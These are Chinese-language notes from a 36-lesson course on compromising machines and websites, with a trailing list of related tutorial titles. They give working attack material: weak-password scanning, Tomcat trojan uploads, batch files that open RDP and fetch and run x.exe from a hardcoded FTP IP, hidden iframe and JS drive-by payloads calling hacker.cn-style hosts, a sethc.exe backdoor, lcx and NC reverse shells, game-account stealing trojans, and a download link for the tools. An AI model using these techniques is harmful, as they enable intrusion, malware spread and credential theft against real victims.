1.第一课
简单系统介绍 常见入侵端口:3389 4899 5900 1433 21 23 135 445
-----------------------------------------------------------------
2.第二课: 80和8080端口拿服务器
step1:使用S扫描器,扫描8080或80端口,保存ip地址ips.txt。
step2:打开 Apache Tomcat Crack工具,-----“设置”-----“导入己扫IP”-----“点导入(ips.txt)”-----“开始”
step3:寻找类似这样的url:http://ip:8080/manager/html
    以下地址为路由器地址,无用。
    url:http://ip:8080
step4:打开网址:http://ip:8080/manager/html,找到上传点,上传木马(webdax.war),木马上传成功即可获得shell.(木马须免杀)
-----------------------------------------------------------------
第3课:5900抓鸡(空口令,现在一般不会存在了)
step1:s扫描器扫5900IP段
step2:打开5900扫描器,输入扫描段
step3:点“开始”,等待扫描结果,带有VULNERABLE字符的即可连接
-----------------------------------------------------------------
第4课:刷钻教程
现在己无法刷钻,
原理:抓到肉鸡后,上传软件“路由器密码查看器”查看到密码,将肉鸡设为代理,此时操作自己的机器不是操作肉鸡的机器,然后登陆刷钻网站,通过宽带支付的方式支付QQ会员什么的。
-----------------------------------------------------------------
第5课:1433抓鸡 
原理:弱口令
-----------------------------------------------------------------
第6课:135抓肉鸡
原理:弱口令
-----------------------------------------------------------------
第7课:免杀环境搭建
就是虚拟机安装,杀毒软件安装
-----------------------------------------------------------------
第8课:网吧上线教程
使用内网端口自动映射工具,也可以使用向日葵等工具。
-----------------------------------------------------------------
第9课:刷钻,略
-----------------------------------------------------------------
第10课:木马手工捆绑
-----------------------------------------------------------------
第11课:给服务器开3389
可以上传一个批处理执行:
------------------------------------------------
echo Windows Registry Editor Version 5.00>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 
echo "fDenyTSConnections"=dword:00000000>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
regedit /s 3389.reg 
del 3389.reg
------------------------------------------------
第12课:网马介绍 略
-----------------------------------------------------------------
第13课:网站挂马实例
------------------------------------------------
1.在自己网站挂马
2.在他人网站挂马
3.框架网马代码
<iframe src="网马地址" width="宽" height="高" scrolling="滚动条" frameborder="边框"></iframe>
例:<iframe src="http://hacker.cn/webshell.html" width="0" height="0" scrolling="no" frameborder="0"></iframe>
可以查看10种挂马方式。
----------------------------------------------------------------------------------------

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
muma.txt可改成任意后缀
四:body挂马

<body οnlοad="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body { 
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript> 
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
----------------------------------------------------------------------------------------
第14课:网站挂马常见问题
------------------------------------------------
网站的常见默认页面有;

index.htm Default.htm index.html Default.html index.asp Default.asp index.php Default.php
网站常见目录
web目录或wwwroot目录

第15课:1521全自动抓鸡教程
------------------------------------------------
oracle 默认的端口号是1521,弱口令爆破抓肉鸡
------------------------------------------------
第16课:简单的指定IP攻击
------------------------------------------------
利用远控软件对目标IP实施攻击,略。
------------------------------------------------
第17课:Radmin4899抓鸡
------------------------------------------------
基本利用弱口令扫4899,现在估计已经失效。无法扫到空口令了。
步骤:

1。安装RADMIN影子版3.2

2。扫4899端口

3。扫4899空口令

4。用RADMIN影子版3.2连接

5。传马运行
------------------------------------------------
-------------------------------------------------------------------------------------
第18课:入侵网站挂马实例
------------------------------------------------
工具:

1.网马生成器

2.ASP木马

3.自已的木马

4.空间域名各一个

入侵步骤:

1.制作自已的网马

2.进入动网后台上传ASP木马提权

3.在入侵的网站上框架自已的网马地址

<Iframe   src="http://www.xxx.com/xx.htm"   width="0"   height="0"  scrolling="no"   frameborder="0"></Iframe>

4.测试

总结:将自己的exe木马上传到自己的网站,并使用见多马生成器生成网马,控制服务器后插入主页框架木马,别人访问即可中马,远控也会上线。

-------------------------------------------------------------------------------------
第19课:DNF盗号教程
------------------------------------------------
DNF盗号教程

工具:
1.空间域名各一个[免费空间可能收不到信]

2.DNF盗号马一个

操作步骤:

将ASP收信文件上传到空间,根据收信文件的地址配置好木马

上传DNF木马,运行,对方会自动退出DNF游戏,当对方重新登陆DNF游戏时,密码会发致我们提前设好的信箱里

然后我们登陆收信后台,查看密码

箱子地址:域名后面加上/lin.asp

后台地址:域名后面加上/index.asp

总结:配置一个自己的ASP网站,用DNF盗号器升成木马,发信地址填箱子地址(就是盗号后发送用户名密码到箱子地址),然后自己登陆后台地址,即可管理

-------------------------------------------------------------------------------------
第20课:2967批量抓鸡教程
------------------------------------------------
2967是诺顿以前版本的一个漏洞

安装后会默认开放2967端口
诺顿的一个溢出洞,原理就是批量扫描,然后对其进行溢出,传马批量获得肉鸡

------------------------------------------------

第21课:3306批量抓鸡教程

------------------------------------------------
3306是装有MYSQL数据库默认开放的端口,hscan爆破,关键在于字典,过程略。
-------------------------------------------------------------------------------------
第22课:2009最新网马演示实例
------------------------------------------------
step1:使用网马生成器生成网马,。
step2:将网站发给别人
step3:别人点击后中马,例子中,是在一个在线聊天室里面发送链接。很快别人就中马了。
-------------------------------------------------------------------------------------
第23课:1433全自动批量抓鸡二
------------------------------------------------
弱口令
1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

-------------------------------------------------------------------------------------
第24课:开启内网肉鸡的3389
------------------------------------------------
工具:1. lcx.exe 2.3389.bat
原理:在肉鸡运行lcx.exe加参数,使肉鸡3389端口连接至本机51端口,利用本机51端口进行监听3388端口,通过访问本机3388端口进行连接肉鸡3389端口
step1:通过各咱方法远程连接目标主机,例如:telnet,命令行上传。lcx.exe 和3389.bat,执行3389.bat.
step2:通过telnet,执行:lcx.exe -slave 本机外网IP 51 肉鸡内网IP 3389,本例:lcx.ext -slave 10.1.1.1 51 10.1.1.3 389
step3:在本机执行:执行:lcx.exe -listen 51 3388
step4:使用远程连接,执行:127.0.0.1:3388。即可远程桌面目标主机。(内网用户需要映射51端口到本机)
-------------------------------------------------------------------------------------
第25课(无此课),第26课:批量拿站入侵FTP空间
------------------------------------------------
工具是自动抓鸡的,没看懂。
-------------------------------------------------------------------------------------
第27课:3306肉鸡争夺
------------------------------------------------
思路:3306爆破入侵肉鸡后,注销用户,命令:logoff ID,查看在线用户命令:query user,替换以下文件

用ping.exe替换以下文件
%systemroot%\system32\net.exe

%systemroot%\system32\net1.exe

%systemroot%\system32\ftp.exe

%systemroot%\system32\edit.com

%systemroot%\system32\attrib.exe

%systemroot%\system32\sc.exe

%systemroot%\system32\at.exe

可以保存为批处理,直接一键执行。

copy %systemroot%\system32\ping.exe %systemroot%\system32\net.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\net1.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\ftp.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\edit.com /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\attrib.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\sc.exe /y

copy %systemroot%\system32\ping.exe %systemroot%\system32\at.exe /y
-------------------------------------------------------------------------------------
第28课:陕西无跳板刷钻操作步骤
----------------------------------------------------------------
略。
----------------------------------------------------------------
第29课:80和8080拿服务器二
----------------------------------------------------------------
step1:入侵8080服务器,拿到shell,在shell中,命令行中输入:
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y 
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y
建立后门,
step2:3389连接,按5次shift,启动后门,在CMD中,输入命令:explorer,调用桌面,接着就可以操作桌面了。
-------------------------------------------------------------------------------------
第30课:asp注入拿站
----------------------------------------------------------------
搜索:inurl:asp?id=92

使用“旁注WEB综合检测程序”注入网站,猜解用户名密码,然后登陆。

--------------------------------------------------------------------------------------
第31课:DZ 7[1].1 7.2最新漏洞的利用
----------------------------------------------------------------
step1:搜索 intitle:Powered by discuz 7.1 
注册一个账号,进入后,复制论坛地址,例如:action="http://bbs.jksing.com/bbs/misc.php"修改工具中,dz.htm,改成例子中的地址。
打开dz.hm,点提交,复制界面上的一句话木马forumdata/cache/usergroup_01.php,前面加了论坛地址,例如http://bbs.jksing.com/forumdata/cache/usergroup_01.php,此为一句话木马,连接一句话木马,使用客户端 ,lanker.htm,复制木马地址进去,上传后门木马上去,即可获得shell.密码eye
--------------------------------------------------------------------------------------
第32课:445抓鸡
----------------------------------------------------------------
step1:开启扫鸡的服务
服务批处理;
------------------------------------------
@echo off
color c
title 全自动开启服务
echo.
echo 提示:开始扫描前需要检测并开启以下服务,请稍等....
echo.
sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disabled
net start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul
echo.
echo 开启需要的服务成功完毕!
pause
-----------------------------------------

step2:架设一个HTTP或是FTP服务,工具提供两种传马方式
step3:选择IP段
step4:.扫描 
总结:使用445溢出漏洞自动化。
                         
第33课:2967抓鸡
----------------------------------------------------------------
和36课差不多。以下为传马批处理
----------------------------------------------------------------
net stop sharedaccess
echo open 113.2.136.130> cmd.txt
echo 123>> cmd.txt
echo 123>> cmd.txt
echo binary >> cmd.txt
echo get x.exe>> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
x.exe
x.exe
del cmd.txt. /q /f
exit
exit
----------------------------------------------------------------
----------------------------------------------------------------
第34课:上传漏洞批量拿WEBSHELL
----------------------------------------------------------------
step1:使用挖掘机V1.1搜索,漏洞利用页面:/upfile_other.asp
step2:上传图片,上传小马然后上传大马(打开本地上传工具,修改源代码,替换成要上传的页面地址,前面一个选图片,后面一个选小马或大马)
----------------------------------------------------------------
第35课:5900加X-scan入侵服务器
----------------------------------------------------------------
step1:s扫描器扫5900,保存ip.txt
step2:xscan.exe扫描弱口令,VNClink.exe连接。
----------------------------------------------------------------
第36课:2967手动抓服务器
----------------------------------------------------------------
原理:利用诺顿服务器版漏洞NC反弹监听获取CMD-SHELL
step1:S扫描器扫描2967端口

step2:配置程序(配置scan.bat ,将里面的IP地址改成自己的外网IP,打开“开始.bat”,等待上线)

step3:运行NC监听程序,扫描漏洞主机

内网要映射2967和56端口到本机
----------------------------------------------------------------
总结:大致看一下过程,学习里面的思路,有些漏洞还是可以找到的。

用到的工具:

链接:https://pan.baidu.com/s/12qR0CQ_CRJZAz_vBT6aVUw 
提取码:hbby

极品抓鸡教程36课笔记相关推荐

  1. 火山PC抓取快递物流查询接口教程第二课

    本源码转载自利快云https://www.lkuaiy.com/ 火山PC抓取快递物流查询接口教程第二课 一.本课目标 本节以网页公开快递查询网站(http://www.kuaidi.com)进行教学 ...

  2. 火山PC抓取快递物流查询接口教程第一课

    本源码转载自利快云https://www.lkuaiy.com/ 火山PC抓取快递物流查询接口教程第一课 一.准备工作 工具:精易编程助手,易语言绝佳伙伴,同样适用于火山 下载地址: http://s ...

  3. 《崔庆才Python3网络爬虫开发实战教程》学习笔记(5):将爬虫爬取到的数据存储到TXT,Word,Excel,Json等文件中

    本篇博文是自己在学习崔庆才的<Python3网络爬虫开发实战教程>的学习笔记系列,此套教程共5章,加起来共有34节课,内容非常详细丰富!如果你也要这套视频教程的话,关注我公众号[小众技术] ...

  4. 香帅的北大金融学课笔记8 -- 债务与债券

    香帅的北大金融学课笔记 – 债务与债券 一.债务与债券:时间的价值 1.债 债务:可量化和货币化的责任 隐性债务 中国传统社会中的"凑份子",是一种隐性的债务关系.它是在整个经济资 ...

  5. 《简明Python教程》读书笔记

    <简明Python教程>读书笔记 开篇: 有两种方式构建软件设计:一种是把软件做得很简单以至于明显找不到缺陷,另一种是把它做得很复杂以至于找不到明显的缺陷. --C. AR. Hoare ...

  6. Wireshark数据抓包教程之认识捕获分析数据包

    Wireshark数据抓包教程之认识捕获分析数据包 认识Wireshark捕获数据包 当我们对Wireshark主窗口各部分作用了解了,学会捕获数据了,接下来就该去认识这些捕获的数据包了.Wiresh ...

  7. 办公技巧:Excel教程36个逆天功能,全面了解一下!

    今天给大家收集整理了Excel教程36个逆天功能,全面了解一下!内含操作步骤哦. 1.添加文字下面线条的2种方法 2.设置列宽的3种方法 3.以cm为单位设置行高跟列宽 4.输入0开头数字的2种方法 ...

  8. 香帅的北大金融学课笔记3 -- 投资银行

    香帅的北大金融学课笔记 – 投资银行 一.投资银行及其业务 1.投资银行 投行业务: 零售经纪:开户,赚取交易手续费 证券承销:帮助公司卖发行股票.债券, 企兼并收购:牵线搭桥,进行评估,提供融资建议 ...

  9. 飞桨领航团AI达人创造营第三课笔记

    第三课笔记目录 课后感慨 作业完成记录 制作数据集 训练模型 参考案例 代码解读 unzip git 数据集划分解读 文件选择 问题解决 链接指引 课后感慨 课程是越来越难了,有点难跟上了.但得益于群 ...

  10. JavaScript基础教程速学笔记

    JavaScript基础教程速学笔记 JavaScript简介 JavaScript 是 Web 的编程语言.(但是java与JavaScript的区别就是周杰与周杰伦的区别)所有现代的 HTML 页 ...

最新文章

  1. 一份来自贾扬清的AI修炼指南:不存在算法工程师,调参侠没有市场
  2. delphi 中CreateOleObject函数产生的对象的释放问题
  3. C4.5决策树生成算法完整版(Python),连续属性的离散化, 缺失样本的添加权重处理, 算法缺陷的修正, 代码等
  4. oracle表参数,Oracle 表的创建 及相关参数
  5. C#中事务的简单使用
  6. 人脸识别用照片可以识别吗?当然不能!
  7. 电力系统matlab实验报告,电力系统分析潮流实验报告
  8. 商业需求分析(BRD)模板
  9. 如何解决 RecursionError: maximum recursion depth exceeded
  10. 论文阅读:《Rethinking Pseudo-LiDAR Representation》
  11. C++中std::endl的作用
  12. IMU(LPMS-B2)分析随机误差
  13. 利用Javascript制作宾果(BINGO)游戏
  14. A2dele: Adaptive and Attentive Depth Distiller for Efficient RGB-D Salient Object Detection
  15. 会声会影2022一键安装图文详细教程
  16. 大数据剖析热点新闻:996、巴黎圣母院、奔驰维权为什么成为本周热搜
  17. 3-基于51单片机的篮球计分器
  18. jQuery动画序列
  19. python爬虫——爬取简书文章
  20. matlab绘图之自定义色标colorbar的刻度值

热门文章

  1. Java实现 极光 im 聊天后台发送消息
  2. php ora01017,建立DBLINK报ORA-01017,ORA-02063
  3. centos 下载tomcat8
  4. 天若OCR专业版软件,现可无需联网本地使用了~
  5. pycharm汉化包下载
  6. python 编译成exe vmp加密_[分享]某vmp壳原理分析笔记
  7. cc2640蓝牙数据接收丢包问题
  8. Linux安装yum过程(超详细)
  9. PDMS Pipeline Tool 教程(三):材料表
  10. 脚本小子福利:安卓远控木马直接生成